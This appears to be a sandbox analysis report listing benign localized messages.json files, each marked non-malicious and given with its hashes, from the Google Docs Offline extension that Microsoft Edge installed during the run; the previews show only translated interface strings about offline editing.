Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

